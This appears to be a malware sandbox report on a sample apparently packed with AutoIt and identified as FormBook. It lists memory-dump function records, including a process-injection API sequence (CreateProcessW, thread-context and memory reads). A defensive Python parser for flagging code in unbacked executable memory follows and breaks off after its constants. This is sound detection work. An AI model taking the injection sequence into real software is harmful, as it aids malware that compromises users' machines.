                                                                      • Opcode Fuzzy Hash: b596676b8ed4fe7d0a5c75d586a0e7af28534b96e109a4bd2e9f23cd0fda861b
                                                                      • Instruction Fuzzy Hash: 0C224D70508305DFD724DF14C494A6AB7E1FF84304F19A96DE89AAB3A2D731ED85CB82
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove
                                                                      • String ID:
                                                                      • API String ID: 4104443479-0
                                                                      • Opcode ID: 5de438b4bbeb6ea6bf5d4d191a06a7a70a83262c81ab0dc82e7a250ab2e3169d
                                                                      • Instruction ID: 018b031efee465604020dfa27e95b6b64f3157bb5fc62034c7e23c4e031d2caf
                                                                      • Opcode Fuzzy Hash: 5de438b4bbeb6ea6bf5d4d191a06a7a70a83262c81ab0dc82e7a250ab2e3169d
                                                                      • Instruction Fuzzy Hash: 7F31B3B1B04606AFC704DF68D8D1E69B3A9FF483207159629E459DB2D1EB30F9A0CB90
                                                                      APIs
                                                                      • IsThemeActive.UXTHEME ref: 00E04834
                                                                        • Part of subcall function 00E2336C: __lock.LIBCMT ref: 00E23372
                                                                        • Part of subcall function 00E2336C: DecodePointer.KERNEL32(00000001,?,00E04849,00E57C74), ref: 00E2337E
                                                                        • Part of subcall function 00E2336C: EncodePointer.KERNEL32(?,?,00E04849,00E57C74), ref: 00E23389
                                                                        • Part of subcall function 00E048FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00E04915
                                                                        • Part of subcall function 00E048FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E0492A
                                                                        • Part of subcall function 00E03B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E03B68
                                                                        • Part of subcall function 00E03B3A: IsDebuggerPresent.KERNEL32 ref: 00E03B7A
                                                                        • Part of subcall function 00E03B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,00EC52F8,00EC52E0,?,?), ref: 00E03BEB
                                                                        • Part of subcall function 00E03B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00E03C6F
                                                                      • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E04874
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                      • String ID:
                                                                      • API String ID: 1438897964-0
                                                                      • Opcode ID: 84b2b1101b2b204c81a13f172cef4278fdf8bf9f96d1cb439546b65fd87cfd54
                                                                      • Instruction ID: dfbb67a752d487f3ddb36be0d3f799224b9c3207b8674d1ba745a96602acc3d1
                                                                      • Opcode Fuzzy Hash: 84b2b1101b2b204c81a13f172cef4278fdf8bf9f96d1cb439546b65fd87cfd54
                                                                      • Instruction Fuzzy Hash: CD1181B19043019FC704DF2AE80590EFBE8FB94750F10892EF454A32B2DB719589CB91
                                                                      APIs
                                                                        • Part of subcall function 00E2571C: __FF_MSGBANNER.LIBCMT ref: 00E25733
                                                                        • Part of subcall function 00E2571C: __NMSG_WRITE.LIBCMT ref: 00E2573A
                                                                        • Part of subcall function 00E2571C: RtlAllocateHeap.NTDLL(01000000,00000000,00000001,00000000,?,?,?,00E20DD3,?), ref: 00E2575F
                                                                      • std::exception::exception.LIBCMT ref: 00E20DEC
                                                                      • __CxxThrowException@8.LIBCMT ref: 00E20E01
                                                                        • Part of subcall function 00E2859B: RaiseException.KERNEL32(?,?,?,00EB9E78,00000000,?,?,?,?,00E20E06,?,00EB9E78,?,00000001), ref: 00E285F0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                      • String ID:
                                                                      • API String ID: 3902256705-0
                                                                      • Opcode ID: adce411fa217c43688a3c4e6b53aec71d8e264d645e89a53b46671d51d77692a
                                                                      • Instruction ID: 35e876072270b94904df2444322b02080c1760002821050f70920e1a85fa7bd8
                                                                      • Opcode Fuzzy Hash: adce411fa217c43688a3c4e6b53aec71d8e264d645e89a53b46671d51d77692a
                                                                      • Instruction Fuzzy Hash: CAF0813550222967CF10BAA4FD129DEB7E8AF01315F10642AFA14B6182DF709A80D6D1
                                                                      APIs
                                                                        • Part of subcall function 00E28B28: __getptd_noexit.LIBCMT ref: 00E28B28
                                                                      • __lock_file.LIBCMT ref: 00E253EB
                                                                        • Part of subcall function 00E26C11: __lock.LIBCMT ref: 00E26C34
                                                                      • __fclose_nolock.LIBCMT ref: 00E253F6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                      • String ID:
                                                                      • API String ID: 2800547568-0
                                                                      • Opcode ID: 9cba22f98c5c2a8b3e5cee4194f7545e8bc016c7d3ed3c6cf93d04bfb1d8896e
                                                                      • Instruction ID: 1d3ac7d2e99e8a37d04e4920b839bcb9706f822383fa588ec1d270510a4b1fe7
                                                                      • Opcode Fuzzy Hash: 9cba22f98c5c2a8b3e5cee4194f7545e8bc016c7d3ed3c6cf93d04bfb1d8896e
                                                                      • Instruction Fuzzy Hash: EFF09632802A249ADB10BB65BE027AD66E06F41374F24B258E424BB1C5CFFC49415B51
                                                                      APIs
                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 0104F2F3
                                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0104F389
                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0104F3AB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2184455170.000000000104D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_104d000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                      • String ID:
                                                                      • API String ID: 2438371351-0
                                                                      • Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                      • Instruction ID: 5e6e5735bf891754d4d1010a0c4587705beadcde124f2cedeef484df515507bd
                                                                      • Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                      • Instruction Fuzzy Hash: D212DE24E18658C6EB24DF64D8507DEB272EF68300F1090E9910DEB7A5E77A4F81CF5A
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                      • Instruction ID: 73677cdd7ad84c02983c7ff88aed462ee8c583043274a97e7ba895fd345cf3ba
                                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                      • Instruction Fuzzy Hash: 703106B0A001159FC718DF08E486969F7A6FF49314B2497A5E80AEB392DB31EDC1DBC0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: ClearVariant
                                                                      • String ID:
                                                                      • API String ID: 1473721057-0
                                                                      • Opcode ID: a8b81aa0b7f91eabb3c66a9dd8973723ff1be4968701871ea2436df289a75f30
                                                                      • Instruction ID: 20778dccc8d37b17447316a3ee74fbbc438c4e8fabf5c8046827a8993adfed5d
                                                                      • Opcode Fuzzy Hash: a8b81aa0b7f91eabb3c66a9dd8973723ff1be4968701871ea2436df289a75f30
                                                                      • Instruction Fuzzy Hash: 2D411A745043519FDB14DF14C488B1ABBE1BF45318F0998ACE999AB3A2C731EC85CF52
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove
                                                                      • String ID:
                                                                      • API String ID: 4104443479-0
                                                                      • Opcode ID: 510767285f01f67e0c968dd9e184407f69ed7eb2e8f7c6e1e6b906d155b48b4f
                                                                      • Instruction ID: 62a9a81a813f1ef3693ab604ddd2492c4eb24618702b100b523bf2f0cc64a6b9
                                                                      • Opcode Fuzzy Hash: 510767285f01f67e0c968dd9e184407f69ed7eb2e8f7c6e1e6b906d155b48b4f
                                                                      • Instruction Fuzzy Hash: EE210272A04A19EBDB148F12E8457AEBFF4FB14350F21A529E986E52E0EB3090D0DB41
                                                                      APIs
                                                                        • Part of subcall function 00E04BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00E04BEF
                                                                        • Part of subcall function 00E2525B: __wfsopen.LIBCMT ref: 00E25266
                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00EC52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E04E0F
                                                                        • Part of subcall function 00E04B6A: FreeLibrary.KERNEL32(00000000), ref: 00E04BA4
                                                                        • Part of subcall function 00E04C70: _memmove.LIBCMT ref: 00E04CBA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Library$Free$Load__wfsopen_memmove
                                                                      • String ID:
                                                                      • API String ID: 1396898556-0
                                                                      • Opcode ID: 08d6b892e94521415c6e540abbbeb010e8affe4ca5b60be66ba51a1a13d2bdf3
                                                                      • Instruction ID: 4f2eff90e4d59fe1d69c40429d5a2b73e4ea16f5d5574971b99b15b884cc4d5c
                                                                      • Opcode Fuzzy Hash: 08d6b892e94521415c6e540abbbeb010e8affe4ca5b60be66ba51a1a13d2bdf3
                                                                      • Instruction Fuzzy Hash: C711E3B264020AABCF15BF70DE16FAD77E8EF84710F109829F641BB1C1EA719A419B50
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: ClearVariant
                                                                      • String ID:
                                                                      • API String ID: 1473721057-0
                                                                      • Opcode ID: 7e7b137bc14b94c0c2f6fa6e84c2b300a334605767cc99dc3d710db70f2c780d
                                                                      • Instruction ID: db1a059bdc170d668b9006c5e77906d26d605ade9c4148bbcf8a1a5408a49dfe
                                                                      • Opcode Fuzzy Hash: 7e7b137bc14b94c0c2f6fa6e84c2b300a334605767cc99dc3d710db70f2c780d
                                                                      • Instruction Fuzzy Hash: 9F215A74508301DFDB14DF14C844A5ABBE0BF88318F09986CF98967762C731E844CB52
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cdba1a02a84a936c51082150c65d0ab6fd7c3ce4248e23738481275dedc76eb4
                                                                      • Instruction ID: fd7d36b28907032ecea3d0c9c58a0db04dd04b64f25a2e1ec517c3172eb9062b
                                                                      • Opcode Fuzzy Hash: cdba1a02a84a936c51082150c65d0ab6fd7c3ce4248e23738481275dedc76eb4
                                                                      • Instruction Fuzzy Hash: 65012832444125DFE7216A54BC82AFAB7EDEFC1321F20807BFC48E68A1D6709C85CAD1
                                                                      APIs
                                                                      • CharUpperBuffW.USER32(00000000,?,00000000,00000048,-00000003,?,00E13E69,?,?,?,-00000003,00000000,00000000), ref: 00E08280
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharUpper
                                                                      • String ID:
                                                                      • API String ID: 3964851224-0
                                                                      • Opcode ID: 4d8a9642d8998f8091a41753da9d9cc4aeea931c85218432df8f28c612c367a9
                                                                      • Instruction ID: d0493d8ae1aa5aa9b9e078e7cc246ab806d04a279b4cbf912094a7b814855f06
                                                                      • Opcode Fuzzy Hash: 4d8a9642d8998f8091a41753da9d9cc4aeea931c85218432df8f28c612c367a9
                                                                      • Instruction Fuzzy Hash: B1F0F675605E32DBC7116B55D60062AFBA4FF44F60F005129F58A666E1CF71E860CBC4
                                                                      APIs
                                                                      • __lock_file.LIBCMT ref: 00E248A6
                                                                        • Part of subcall function 00E28B28: __getptd_noexit.LIBCMT ref: 00E28B28
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: __getptd_noexit__lock_file
                                                                      • String ID:
                                                                      • API String ID: 2597487223-0
                                                                      • Opcode ID: 0e15f081f023f291e3061e58f81f02dc2d85f5db84d92e2e34fff44a233e536e
                                                                      • Instruction ID: c05d31dedbdf3222fb5f527579047154d2334e3a51d02309af579500bc7072c3
                                                                      • Opcode Fuzzy Hash: 0e15f081f023f291e3061e58f81f02dc2d85f5db84d92e2e34fff44a233e536e
                                                                      • Instruction Fuzzy Hash: 4EF022B1911228EBDF19AFB0AC063EE36E0BF01324F04A404F424BA2C2DBB88950DB41
                                                                      APIs
                                                                      • FreeLibrary.KERNEL32(?,?,00EC52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E04E7E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: FreeLibrary
                                                                      • String ID:
                                                                      • API String ID: 3664257935-0
                                                                      • Opcode ID: 5c6f1bae75497d70681d192ac505f074b760d5b9bb07e50435a9c67a64ae2301
                                                                      • Instruction ID: 980f7235beef8a9cf4742d7b3c6186970bd1c6516b1b4a0939778594f8b02691
                                                                      • Opcode Fuzzy Hash: 5c6f1bae75497d70681d192ac505f074b760d5b9bb07e50435a9c67a64ae2301
                                                                      • Instruction Fuzzy Hash: 31F065F1501712CFCB349F64E594852B7F1BF14369320993EE2D7A6690C7319885DF40
                                                                      APIs
                                                                      • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00E207B0
                                                                        • Part of subcall function 00E07BCC: _memmove.LIBCMT ref: 00E07C06
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: LongNamePath_memmove
                                                                      • String ID:
                                                                      • API String ID: 2514874351-0
                                                                      • Opcode ID: 1b80624a344d429f7886f8289f24ce983c718795781da4ea96f077af40eeee06
                                                                      • Instruction ID: 1d57e37be0d26ae5da5a28b978564cb32bfc84548389c4a540ee7741be1218f0
                                                                      • Opcode Fuzzy Hash: 1b80624a344d429f7886f8289f24ce983c718795781da4ea96f077af40eeee06
                                                                      • Instruction Fuzzy Hash: 65E0CD369041285BC720D6599C05FEA77DDDFC87A0F0541F5FC0CE7254DD60AC8086D0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: __wfsopen
                                                                      • String ID:
                                                                      • API String ID: 197181222-0
                                                                      • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                      • Instruction ID: a36b2be3ec9fe9a0b4ed2e102b7981a8cfb5a51a3a4957ef66d120c007cbb6a6
                                                                      • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                      • Instruction Fuzzy Hash: 23B0927744020CB7CE012A82FC02A593B699B41764F408020FB0C281B2A673A6649A89
                                                                      APIs
                                                                      • Sleep.KERNELBASE(000001F4), ref: 0104FB49
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2184455170.000000000104D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_104d000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID:
                                                                      • API String ID: 3472027048-0
                                                                      • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                      • Instruction ID: 86cd7f95f29b9441899c67b72e25cdbcda31f1b8999cae92e5cf5ac5e5179438
                                                                      • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                      • Instruction Fuzzy Hash: D4E0BF7494020EEFDB00DFA8D5496DE7BB4EF04301F1005A1FD05D7680DB309E54CA66
                                                                      APIs
                                                                      • Sleep.KERNELBASE(000001F4), ref: 0104FB49
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2184455170.000000000104D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_104d000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID:
                                                                      • API String ID: 3472027048-0
                                                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                      • Instruction ID: 4830c8671998410559b07850baf1b2e0317952bd8f39c7c78125f3982b78c376
                                                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                      • Instruction Fuzzy Hash: B0E0E67494020EDFDB00DFB8D5496DE7BB4EF04301F100161FD01D2280D6309D50CA62
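The two Sleep records above sit in a region that is "based on PE: false", unlike every AutoIt runtime function before them, which lives in the mapped image at 00E00000. Whether a function record points at image-backed memory or at an anonymous executable region is the quickest way to separate the packer/runtime from the unpacked FormBook code when working through a report of this size. The following script is an added example and not part of the Joe Sandbox report or its tooling: it parses the function records (a constructed sample copied from the lines above) into structured data and flags functions found in writable-and-executable memory that no PE image backs. The decoding of the dot-separated dump filename into base address, Protect, AllocationProtect and Type is an assumption made for this example (the page does not document the field layout); the Windows constant values themselves are from winnt.h.

```python
"""Parse Joe Sandbox function records and flag code in non-image W+X memory.

Added example; not part of the report or of Joe Sandbox. The dump filename
field layout below is an assumption for illustration, not documented on the page.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Windows memory constants (winnt.h).
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80
MEM_PRIVATE = 0x20000
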